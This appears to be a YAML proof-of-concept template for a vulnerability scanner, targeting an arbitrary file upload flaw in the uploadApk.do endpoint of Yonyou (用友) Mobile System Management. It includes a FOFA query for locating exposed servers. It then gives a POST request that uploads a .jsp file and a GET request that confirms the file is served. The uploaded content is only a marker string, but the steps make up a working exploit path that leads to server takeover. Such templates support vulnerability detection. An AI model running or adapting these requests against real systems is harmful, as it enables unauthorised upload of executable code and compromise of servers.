product: 用友移动系统管理
vName: 用友移动系统管理uploadApk.do任意文件上传
type: 文件上传
vID: [ ]
level: 3
vDesc: 用友移动系统管理 uploadApk.do 接口存在任意文件上传漏洞，攻击者通过漏洞可以获取服务器权限
version: ''
note: ''
search:
  FOFA: app="用友-移动系统管理"
protocol: http
link: https://www.cnblogs.com/pursue-security/p/17684819.html
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /maportal/appmanager/uploadApk.do?pk_obj=
      file:
        downloadpath:
          - 52e039302a62d077.jsp
          - 95cc64dd2825f9df13ec4ad683ecf339
          - application/msword
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - '"status":2'
            logic: and
  - exp:
      method: get
      follow: false
      path: /maupload/apk/52e039302a62d077.jsp
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 95cc64dd2825f9df13ec4ad683ecf339
            logic: and